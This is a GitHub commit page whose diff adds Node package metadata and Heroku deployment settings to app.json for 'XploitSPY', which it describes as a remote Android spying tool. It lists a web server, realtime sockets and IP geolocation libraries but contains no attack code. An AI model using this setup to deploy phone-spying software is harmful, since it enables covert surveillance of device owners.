Skip to content

Commit 8e0954c

Browse files
authored
Update app.json
1 parent 785761f commit 8e0954c

File tree

1 file changed

+19
-0
lines changed

1 file changed

+19
-0
lines changed

app.json

+19
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,23 @@
11
{
2+
"name": "xploitspy",
3+
"version": "1.0.0",
4+
"description": "XploitSPY - Remote Android Spying Tool",
5+
"main": "index.js",
6+
"scripts": {
7+
"start": "node index.js",
8+
"test": "node index.js"},
9+
"author": "XploitWizer",
10+
"license": "ISC",
11+
"dependencies": {
12+
"body-parser": "^1.19.0",
13+
"cookie-parser": "^1.4.4",
14+
"ejs": "^2.6.2",
15+
"express": "^4.17.1",
16+
"geoip-lite": "^1.3.7",
17+
"lowdb": "^1.0.0",
18+
"socket.io": "^2.2.0"
19+
},
20+
221
"buildpacks": [
322
{
423
"url": "heroku/jvm"

0 commit comments

Comments
 (0)